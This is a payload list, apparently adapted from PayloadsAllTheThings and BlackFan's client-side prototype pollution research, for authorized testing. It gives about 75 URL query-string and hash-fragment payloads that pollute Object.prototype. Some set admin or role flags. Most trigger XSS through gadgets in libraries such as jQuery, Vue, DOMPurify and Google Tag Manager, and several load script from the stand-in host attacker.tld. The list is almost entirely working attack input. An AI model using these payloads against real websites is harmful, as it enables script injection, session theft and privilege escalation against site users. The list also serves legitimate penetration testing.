# Prototype pollution — URL query string and hash fragments (PAT + BlackFan CSPP)
# Append to any page with vulnerable query parsers. Authorized testing only.

?__proto__[test]=test
?__proto__.test=test
?__proto__[admin]=1
?__proto__[isAdmin]=true
?__proto__[role]=admin
?constructor[prototype][test]=test
?constructor.prototype.test=test
?constructor[prototype][admin]=1
?a[__proto__][abaeead]=abaeead
?a.__proto__.edcbcab=edcbcab
?__proto__[eedffcb]=eedffcb
?__proto__.baaebfc=baaebfc
?__proto__[polluted]=yes
?__proto__[innerHTML]=<img/src/onerror=alert(1)>
?__proto__[src]=javascript:alert(1)
?__proto__[onerror]=alert(1)
?__proto__[href]=javascript:alert(1)
?__proto__[url]=data:,alert(1)//
?__proto__[dataType]=script
?__proto__[crossDomain]=
?__proto__[context]=<img/src/onerror=alert(1)>
?__proto__[jquery]=x
?__proto__[url][]=data:,alert(1)//
?__proto__[src][]=data:,alert(1)//
?__proto__[div][0]=1&__proto__[div][1]=<img/src/onerror=alert(1)>
?__proto__[preventDefault]=x&__proto__[handleObj]=x&__proto__[delegateTarget]=<img/src/onerror=alert(1)>
?__proto__[OnError]=alert(1)&__proto__[SRC]=fake.jpg
?__proto__[handler][]=x&__proto__[selector][]=<img/src/onerror=alert(1)>
?__proto__[attrs][src]=1&__proto__[src]=data:,alert(1)//
?__proto__[whiteList][img][0]=onerror&__proto__[whiteList][img][1]=src
?__proto__[ALLOWED_ATTR][0]=onerror&__proto__[ALLOWED_ATTR][1]=src
?__proto__[documentMode]=9
?__proto__[*][]=onload
?__proto__[innerText]=<img/src/onerror=alert(1)>
?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1)
?__proto__[tagName]=img&__proto__[src][]=x:&__proto__[onerror][]=alert(1)
?__proto__[v-if]=_c.constructor('alert(1)')()
?__proto__[attrs][0][name]=src&__proto__[attrs][0][value]=xxx&__proto__[xxx]=data:,alert(1)//&__proto__[is]=script
?__proto__[template]=<img/src/onerror=alert(1)>
?__proto__[data]=a&__proto__[template][nodeType]=a&__proto__[template][innerHTML]=<img/src/onerror=alert(1)>
?__proto__[props][][value]=a&__proto__[name]=":''.constructor.constructor('alert(1)')(),"
?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()
?__proto__[lng]=cimode&__proto__[appendNamespaceToCIMode]=x&__proto__[nsSeparator]=<img/src/onerror=alert(1)>
?__proto__[cookieName]=COOKIE=Injection;
?__proto__[BOOMR]=1&__proto__[url]=//attacker.tld/xss.js
?__proto__[Config][SiteOptimization][enabled]=1&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?
?__proto__[customScriptSrc]=//attacker.tld/xss.js
?__proto__[assethost]=javascript:alert(1)//
?__proto__[vtp_enableRecaptcha]=1&__proto__[srcdoc]=<img/src/onerror=alert(1)>
?__proto__[q][0][0]=require&__proto__[q][0][1]=x&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js?id=GTM-XXXX
?__proto__[trustedTypes]=x&__proto__[emptyHTML]=<img/src/onerror=alert(1)>
?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//
?__proto__[*%20ONERROR]=1&__proto__[*%20SRC]=1
?__proto__[4]=a':1,[alert(1)]:1,'b&__proto__[5]=,
?__proto__[script][0]=1&__proto__[script][1]=<img/src/onerror=alert(1)>
?__proto__[html]=<img/src/onerror=alert(1)>
?__proto__[div][intro]=<img/src/onerror=alert(1)>
?__proto__[ontransitionend]=alert(1)&__proto__[arrow][style]=color:red;transition:all%201s
?__proto__[dataHost]=attacker.tld/xss.js%23
?__proto__[preventDefault][__proto__][handleObj][__proto__][delegateTarget]=<img/src/onerror=alert(1)>
?a[constructor][prototype]=image&a[constructor][prototype][onerror]=alert(1)
?__proto__[src]=image&__proto__[onerror]=alert(1)
?__proto__[xxx]=alert(1)
?__proto__[onload]=alert(1)
?__proto__[hif][]=javascript:alert(1)
?__proto__[srcdoc][]=<img/src/onerror=alert(1)>
?__proto__[NUMBER]=test
?__proto__[123]=test
?__proto__.array=1|2|3
?__proto__[test]={"json":"value"}
#__proto__[test]=test
#__proto__[admin]=1
#a=b&__proto__[admin]=1
#xxx=1&__proto__[innerHTML]=<img/src/onerror=alert(1)>
